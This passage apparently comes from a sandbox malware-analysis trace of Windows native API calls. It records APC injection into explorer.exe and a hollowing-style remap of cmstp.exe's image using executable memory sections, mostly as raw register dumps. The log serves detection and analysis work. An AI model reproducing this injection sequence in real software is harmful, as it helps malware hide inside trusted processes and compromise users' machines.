BaseAddress=0x7707f0) returned 1 [0123.823] NtOpenProcess (in: ProcessHandle=0x36dd48, DesiredAccess=0x438, ObjectAttributes=0x36d2f8*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x36d338*(UniqueProcess=0x45c, UniqueThread=0x0) | out: ProcessHandle=0x36dd48*=0x8c) returned 0x0 [0123.827] NtQueryInformationProcess (in: ProcessHandle=0x8c, ProcessInformationClass=0x0, ProcessInformation=0x36d348, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x36d348, ReturnLength=0x0) returned 0x0 [0123.834] NtOpenThread (in: ThreadHandle=0x36d2f0, DesiredAccess=0x1a, ObjectAttributes=0x36d2f8, ClientId=0x36d328*(UniqueProcess=0x0, UniqueThread=0x460) | out: ThreadHandle=0x36d2f0*=0x90) returned 0x0 [0123.839] NtSuspendThread (in: ThreadHandle=0x90, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0123.846] NtGetContextThread (in: ThreadHandle=0x90, Context=0x36d840 | out: Context=0x36d840*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xd3, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0xd3, SegGs=0x0, SegFs=0x24c0cc0, SegEs=0x0, SegDs=0x12f5e8, Edi=0x0, Esi=0x100ee, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x121, Esp=0x0, SegSs=0x24b8ab0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xc, [5]=0xda, [6]=0x12, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x3a, [45]=0x93, [46]=0x5f, [47]=0x77, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0123.851] NtSetContextThread (ThreadHandle=0x90, Context=0x36d840*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xd3, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0xd3, SegGs=0x0, SegFs=0x24c0cc0, SegEs=0x0, SegDs=0x12f5e8, Edi=0x0, Esi=0x100ee, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x121, Esp=0x0, SegSs=0x24b8ab0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xc, [5]=0xda, [6]=0x12, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x1, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x4, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xb5, [45]=0xfd, [46]=0xc0, [47]=0x8, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0123.851] NtQueueApcThread (ThreadHandle=0x90, ApcRoutine=0x8c0fdd9, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0123.860] NtResumeThread (in: ThreadHandle=0x90, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0123.861] NtClose (Handle=0x8c) returned 0x0 [0123.861] NtClose (Handle=0x90) returned 0x0 [0123.861] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32.dll", BaseAddress=0x36da40 | out: BaseAddress=0x36da40*=0x766d0000) returned 0x0 [0123.894] PostThreadMessageW (idThread=0x460, Msg=0x111, wParam=0x0, lParam=0x0) returned 1 [0123.953] NtDelayExecution (Alertable=0, Interval=0x36dab8*=-30000000) returned 0x0 [0128.363] NtReadVirtualMemory (in: ProcessHandle=0x88, BaseAddress=0x8c52000, Buffer=0x36dadc, NumberOfBytesToRead=0x2a8, NumberOfBytesRead=0x0 | out: Buffer=0x36dadc*, NumberOfBytesRead=0x0) returned 0x0 [0128.365] NtClose (Handle=0x88) returned 0x0 [0128.366] NtOpenProcess (in: ProcessHandle=0x36ebb8, DesiredAccess=0x438, ObjectAttributes=0x36e478*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x36e44c*(UniqueProcess=0xed8, UniqueThread=0x0) | out: ProcessHandle=0x36ebb8*=0x88) returned 0x0 [0128.373] NtOpenThread (in: ThreadHandle=0x36ebbc, DesiredAccess=0x1a, ObjectAttributes=0x36e478, ClientId=0x36e444*(UniqueProcess=0x0, UniqueThread=0xedc) | out: ThreadHandle=0x36ebbc*=0xa0) returned 0x0 [0128.373] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SysWOW64\\cmstp.exe", NtPathName=0x36da7c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SysWOW64\\cmstp.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0128.374] NtCreateFile (in: FileHandle=0x36da9c, DesiredAccess=0x120089, ObjectAttributes=0x36da64*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SysWOW64\\cmstp.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x36da84, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x36da9c*=0xa4, IoStatusBlock=0x36da84*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0128.374] RtlFreeHeap (HeapHandle=0x770000, Flags=0x0, BaseAddress=0x785378) returned 1 [0128.374] NtQueryInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x36da84, FileInformation=0x36d9dc, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x36da84, FileInformation=0x36d9dc) returned 0x0 [0128.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15000) returned 0x785378 [0128.381] NtReadFile (in: FileHandle=0xa4, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0x36da84, Buffer=0x785378, BufferLength=0x14c00, ByteOffset=0x36d9f4*=0, Key=0x0 | out: IoStatusBlock=0x36da84, Buffer=0x785378*) returned 0x0 [0128.478] NtClose (Handle=0xa4) returned 0x0 [0128.478] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18001) returned 0x79a380 [0128.481] RtlFreeHeap (HeapHandle=0x770000, Flags=0x0, BaseAddress=0x785378) returned 1 [0128.481] NtQueryInformationProcess (in: ProcessHandle=0x88, ProcessInformationClass=0x0, ProcessInformation=0x36dde8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x36dde8, ReturnLength=0x0) returned 0x0 [0128.481] NtReadVirtualMemory (in: ProcessHandle=0x88, BaseAddress=0x7efde008, Buffer=0x36e9ac, NumberOfBytesToRead=0x4, NumberOfBytesRead=0x0 | out: Buffer=0x36e9ac*, NumberOfBytesRead=0x0) returned 0x0 [0128.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x36e490*=0x20000, RegionSize=0x36e494, FreeType=0x8000) returned 0x0 [0128.481] NtReadVirtualMemory (in: ProcessHandle=0x88, BaseAddress=0xc60000, Buffer=0x79a380, NumberOfBytesToRead=0x18000, NumberOfBytesRead=0x0 | out: Buffer=0x79a380*, NumberOfBytesRead=0x0) returned 0x0 [0128.522] NtCreateSection (in: SectionHandle=0x36ec48, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x36e49c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x36ec48*=0xa4) returned 0x0 [0128.523] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0xffffffff, BaseAddress=0x36ec44*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x36e49c*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x36ec44*=0x180000, SectionOffset=0x0, ViewSize=0x36e49c*=0x2f000) returned 0x0 [0128.526] NtMapViewOfSection (in: SectionHandle=0xa4, ProcessHandle=0x88, BaseAddress=0x36e704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x36e930*=0x2e200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x36e704*=0x70000, SectionOffset=0x0, ViewSize=0x36e930*=0x2f000) returned 0x0 [0128.553] NtCreateSection (in: SectionHandle=0x36e9a4, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x36e4ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x36e9a4*=0xa8) returned 0x0 [0128.553] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0xffffffff, BaseAddress=0x36e9a8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x36e4ac*=0x18000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x36e9a8*=0x20000, SectionOffset=0x0, ViewSize=0x36e4ac*=0x18000) returned 0x0 [0128.577] RtlFreeHeap (HeapHandle=0x770000, Flags=0x0, BaseAddress=0x79a380) returned 1 [0128.614] NtUnmapViewOfSection (ProcessHandle=0x88, BaseAddress=0xc60000) returned 0x0 [0128.627] NtMapViewOfSection (in: SectionHandle=0xa8, ProcessHandle=0x88, BaseAddress=0x36e9ac*=0xc60000, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x36ebd8*=0x18000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x36e9ac*=0xc60000, SectionOffset=0x0, ViewSize=0x36ebd8*=0x18000) returned 0x0 [0128.642] NtResumeThread (in: ThreadHandle=0xa0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0128.650] ExitProcess (uExitCode=0x0) Thread: id = 96 os_tid = 0xed4 Process: id = "7" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x71de6000" os_pid = "0x45c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "6" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e957" [0xc0000007], "LOCAL" 